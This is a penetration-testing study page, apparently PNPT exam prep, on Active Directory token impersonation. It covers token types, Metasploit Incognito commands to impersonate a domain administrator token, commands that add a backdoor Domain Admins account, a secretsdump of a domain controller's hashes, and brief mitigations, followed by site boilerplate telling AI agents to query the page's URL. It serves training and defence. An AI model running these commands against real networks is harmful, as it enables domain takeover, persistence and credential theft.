# Token Impersonation ## Overview Tokens are temporary keys that allow you access to a system/network without having to provide credentials each time you access a file #### Token Types * Delegate: Created when you login to a machine or via RDP * Impersonation: "non-interactive" such as attaching a network drive or a domain logon script This can be really bad if a Domain Administrator has logged onto the machine and the token still resides inside it. Using **Metasploit** and the **Incognito** module is the most common and easiest way of performing this attack. We can add a new user to the **Domain Admins** group and use it as a backdoor into the domain for other attacks like a[ secretsdump ](/active-directory/post-compromise-attacks/dumping-and-cracking-hashes.md)on the Domain Controller. For the attack to work, the compromised user account must be a Local Administrator or have special privileges to impersonate tokens ```powerquery whoami /all ``` ## Token Impersonation Attack via Metasploit #### Inside existing meterpreter shell ```bash load incognito list_tokens -u impersonate_token PNPT\\administrator rev2self go back to original shell ``` #### Create backdoor Domain Admin user ```powershell net user /add john Password1! /domain net group "Domain Admins" john /add /domain ``` #### Secretsdump on Domain Controller ```bash imapcket-secretsdump PNPT.local/john:'Password1!'@192.168.1.129 ``` ## Mitigation * Limit the user/group token creation * Have Account tiering * Local Administrator restrictions --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://pnpt.adot8.com/active-directory/post-compromise-attacks/token-impersonation.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.